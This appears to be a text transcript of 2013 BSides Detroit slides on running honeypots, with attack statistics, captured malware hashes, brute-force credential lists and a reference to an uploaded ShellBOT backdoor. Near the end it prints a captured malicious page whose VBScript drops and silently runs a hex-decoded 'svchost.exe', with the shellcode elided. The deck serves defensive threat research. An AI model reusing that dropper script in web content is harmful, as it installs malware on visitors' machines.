bsides detroit 2013 honeypots
TRANSCRIPT
Be vewy, vewy quiet….
let’s watch some hackers..
Interactive portion intro
Whoami
What is a Honeypot?
Different Honeypots
Why Honeypots?
Things I discovered
Stratagem
Interactive portion end results
Interactive portion
SSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)
FatherHusband
Geek
Antagonist of the shiny things
ShadowServer.org volunteer
Security analyst
Whoami
A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)
Why Honeypots?
Why Honeypots?
Low interactionServer Honeypots
HoneyD
Low interactionServer Honeypots
Conpot
Different Honeypots
Clientside Honeypots
Windows XP SP 0 Windows Vista SP 0
Client HoneypotsHigh Interaction
Different Honeypots
Initial Research
A word of advice on using an EC2 instance.
GeoIP locationDionaea - Ireland
Dionaea stats
Started 3/7/2013Stopped 3/9/2013
Started 3/12/2013Stopped 3/14/2013
Graphs are courtesy of DionaeaFRtool
Dionaea stats
• Don’t forget to add your API key from VirusTotal to your config file!!
• If you don’t add the API key, then the pretty visualization tool can’t do it’s job and you have to do manually!!!
144
109
71
56
1714
14
99
8
Dionaea statsTop 10 IP addresses
Wireshark AnalysisAttack Attempts
Malware CapturesMD5 Virus Total
Detection Ratio
Common name Source IP Address/WhoIs
78c9042bbcefd65beaa0d40386da9f89
44 / 46 Microsoft -Worm:Win32/Conficker.C
• 209.190.25.37
• XLHost – VPS provider
• http://www.xlhost.com/
7acba0d01e49618e25744d9a08e6900c
45 / 46 Microsoft -Worm:Win32/Conficker.B
69.28.137.10LimeLight Networks - a Digital Presence Management companyhttp://www.limelight.com/
90c081de8a30794339d96d64b86ae194
42 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu
69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.net
bcaef2729405ae54d62cb5ed097efa12
43 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj
69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/
GeoIP locationDionaea - recent
Dionaea •Detection
Dionaea •Detection
Dionaea •Detection
Kippo
Started 2/27/2013Stopped 3/1/2013
IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1
•Files uploaded - 1
1342
1190
454
163163
156
28 2216
54
1 1
Kippo stats
2/27 to 3/1
Attacker's IP addresses/connection attempts
GeoIP locationKippo – recent
Kippo statsro
ot
bin
ora
cle
test
nagio
s
mart
in
toor
ftpuser
user
postg
res
info
webm
aste
r
apache
backup
guest
r00t
public
gre
en
dem
o
sit
e
jeff
andy
i-heart
user0
conte
nt
1856
6717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3
Top 25 User names
2/27 – 3/1
Times tried
Kippo stats
27
16
9 9 98
7 7 7 7 7 7 7 7 7 7 76 6 6
Top 25 Passwords
2/27 to 3/1
Tries
Kippo stats
Accounts that used 123456 as password
User ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1
“7 successful logons? But your chart says 27 used the password of 123456?! WTF?”
Kippo stats
root öÎÄ¥þ.òÄ¿Â¥ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_
Interesting passwords
Kippo statsFile downloaded
psyBNC 2.3.2
------------
This program is useful for people who cannot be on irc all the time. Its used to keep a connection to irc and your irc client connected, or also allows to act as a normal bouncer by disconnecting from the irc server when the client disconnects.
Kippo
Started 5/31/2013Stopped 6/1/2013
IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4
•Files uploaded - 1
670
398
273
9088
6462
2825
135 5 4
22
11
11
1
Kippo stats
5/31 to 6/1
Attackers IP addresses/connection attempts
22
12
10 109 9 9 9
8 87 7 7 7
6 6 6 6 6 6 6 6 65 5
Top 25 passwords
5/31 to 6/1
Attempts
Kippo stats
1184
17 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4
Top 25 user names
5/31 to 6/1
Login attempts
Kippo stats
Kippo statsReplay script – 20130603-104907-9177.log
Just trying to run Perl
Kippo statsReplay script – 20130530-134418-3935.log
Upload of shellbot.pl
Kippo statsFile downloaded
#!/usr/bin/perl## ShellBOT by: devil__
Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
Backdoor.Shellbot is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer.
As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer.
Backdoor.ShellbotRisk Level 1: Very Low
Kippo statsReplay script – 20130602-105723-5678.log
Upload a tar.gz and trips a Python reply script
KippoDetection
CTF replay scripts
Kippo
• Config file changes• Custom reply files
Lessons learned
HoneyD
Amun
Started 5/29 Stopped 5/30
IP addresses• Unique IP addresses - 3
• Files uploaded - 2
Amun
Azenv.php (uploaded twice)
• ProxyJudge script
Files uploaded
Thug
• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps
Mwcrawler
PE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)
Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled Document</title> </head><body>
Mwcrawler
<p align="center"><h1>We're sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPT Language=VBScript><!--DropFileName = "svchost.exe“ WriteData =
<Lots of shellcode>
Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>
How you can your netbook useful and fun again!
Project page
Goals◦ Documentation
Tools◦ Honeypots
◦ Network
◦ Malware
◦ Forensics
◦ Tools
Stratagemhttp://sourceforge.net/projects/stratagem/
Honeypots◦ Dionaea
◦ Kippo
◦ Glastopf
◦ HoneyD
◦ Amun
◦ Labrea
◦ Tinyhoneypot
◦ Thug
◦ Conpot
Stratagem
Network
◦ Scapy
◦ proxychains
◦ Ngrep
◦ Network Miner
◦ Amun
◦ Xplico
◦ Capanalysis
◦ Network
Malware
◦ Mwcrawler
◦ Yara
◦ ClamAV
Stratagem Forensics
◦ Volatility
Tools
◦ Tor
◦ i2p
◦ Conky
◦ Guake
◦ Terminator
Stratagem
Capanalysis
Stratagem
Capanalysis
Next?
Resources
• A host at $IP ($location)tried to log into my honeypot's fake Terminal Services server
• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypot's fake MSSQL
Server
http://inguardians.com/
Resources
Resources
http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport
Honeydrive
Keith Dixon@Tazdrumm3r#misec – [email protected]://tazdrumm3r.wordpress.com